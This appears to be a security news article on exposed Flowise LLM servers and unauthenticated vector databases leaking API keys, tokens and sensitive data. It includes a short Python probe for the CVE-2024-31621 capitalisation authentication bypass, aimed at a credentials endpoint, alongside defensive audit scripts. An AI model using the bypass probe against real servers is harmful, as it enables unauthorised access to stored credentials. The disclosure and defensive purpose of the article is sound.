Unprotected LLM Servers Expose Sensitive Corporate and Health Data

August 28, 2024

A large number of servers running open-source large language model (LLM) application builders and vector databases are unintentionally exposing sensitive data on the internet. The exposures are a consequence of the hasty integration of AI into business workflows, often without sufficient attention to securing these tools and the information they handle.

A recent study by Legit Security researcher Naphtali Deutsch revealed this trend by scanning the web for two types of potentially vulnerable open-source AI services: vector databases and LLM application builders, focusing for the latter on the open-source tool Flowise. The study uncovered a wealth of sensitive personal and corporate data that organizations had inadvertently exposed in their rush to adopt generative AI.

Deutsch explains that many developers see these tools online and set them up in their own environments, often neglecting security considerations in the process. Flowise, a popular tool for building a wide range of LLM applications, is backed by Y Combinator and has tens of thousands of stars on GitHub. Because applications built with Flowise routinely handle large volumes of data, securing them is paramount.

An authentication bypass vulnerability in Flowise versions 1.6.2 and earlier, tracked as CVE-2024-31621, was discovered earlier this year. The flaw, which can be exploited simply by capitalizing a few characters in the program's API endpoints, earned a 'high' 7.6 score on the CVSS v3 scale. By exploiting it, Deutsch was able to access 438 Flowise servers containing GitHub access tokens, OpenAI API keys, Flowise passwords and API keys in plaintext, configurations and prompts associated with Flowise apps, and more.
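Public write-ups of the flaw describe an authentication check that reportedly matches the request path case-sensitively while the underlying router resolves paths case-insensitively, which is why a few capital letters are enough to slip past it. The following is a minimal illustrative sketch of that pattern in Python; the hostname, port, and endpoint are hypothetical placeholders, and a probe like this should only ever be pointed at servers you own or are explicitly authorized to test.

```python
# Illustrative sketch of a case-sensitivity authentication bypass probe.
# The host and endpoint below are hypothetical; the pattern mirrors the
# publicly described flaw: an auth check that matches the lowercase path
# prefix while the router treats paths case-insensitively.
import requests

BASE = "http://flowise.example.internal:3000"   # hypothetical test target you own
ENDPOINT = "/api/v1/credentials"                # example protected endpoint

# Normal request: the auth middleware sees the lowercase prefix and demands credentials.
normal = requests.get(BASE + ENDPOINT, timeout=5)

# Capitalizing a character defeats a naive lowercase prefix check,
# but the underlying router still resolves the same handler.
bypass = requests.get(BASE + "/Api/v1/credentials", timeout=5)

print("normal :", normal.status_code)   # 401 expected when authentication is enforced
print("bypass :", bypass.status_code)   # 200 here would indicate the bypass described in CVE-2024-31621
```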

Vector databases, which store the embeddings and source data an AI app retrieves at query time, are also vulnerable to direct attack when reachable from the web. Deutsch discovered approximately 30 vector database servers online with no authentication checks at all, containing clearly sensitive information.
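As an illustration of what "no authentication checks" means in practice, here is a minimal sketch, assuming a REST-style vector database at a hypothetical internal address, of the kind of check a defender might run against their own deployment to confirm it rejects anonymous requests. The hostname, port, and path are placeholders; real API paths vary by product, so consult your database's documentation.

```python
# Minimal sketch: verify that your own vector database deployment rejects
# unauthenticated requests. Host, port, and path are hypothetical and will
# differ by product.
import requests

TARGET = "http://vector-db.example.internal:6333"  # hypothetical internal deployment

try:
    resp = requests.get(f"{TARGET}/collections", timeout=5)  # example metadata endpoint
except requests.RequestException as exc:
    print(f"no response ({exc}) - service not reachable from this network")
else:
    if resp.ok:
        print("WARNING: service answered without credentials:", resp.status_code)
    else:
        print("request rejected as expected:", resp.status_code)
```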

To reduce the risk from exposed AI tools, Deutsch suggests that organizations restrict access to their AI services, monitor and log activity around those services, protect the sensitive data their LLM apps handle, and apply software updates promptly wherever possible. He warns that these tools are new and that many teams do not yet know how to set them up securely, and he notes that while standing up these databases keeps getting easier, securing them is often more complex and tends to lag behind.
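One lightweight way to act on the first two recommendations (limiting access, monitoring and logging) is a recurring audit that confirms each internal AI service still demands credentials and records the result. The sketch below assumes a hand-maintained inventory with hypothetical hostnames and endpoints; it is an illustration of the approach, not a drop-in tool.

```python
# Minimal sketch of a recurring exposure audit over a hand-maintained
# inventory of internal AI services. Hostnames and paths are hypothetical;
# the goal is to confirm each service demands credentials and to keep a
# log of every check, per the recommendations above.
import logging
import requests

logging.basicConfig(filename="ai_service_audit.log", level=logging.INFO,
                    format="%(asctime)s %(levelname)s %(message)s")

# Hypothetical inventory: service name -> endpoint that should require auth.
INVENTORY = {
    "flowise":   "http://flowise.example.internal:3000/api/v1/chatflows",
    "vector-db": "http://vector-db.example.internal:6333/collections",
}

for name, url in INVENTORY.items():
    try:
        resp = requests.get(url, timeout=5)
    except requests.RequestException as exc:
        logging.info("%s unreachable: %s", name, exc)
        continue
    if resp.ok:
        logging.warning("%s answered without credentials (%s)", name, resp.status_code)
    else:
        logging.info("%s rejected the unauthenticated request (%s)", name, resp.status_code)
```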
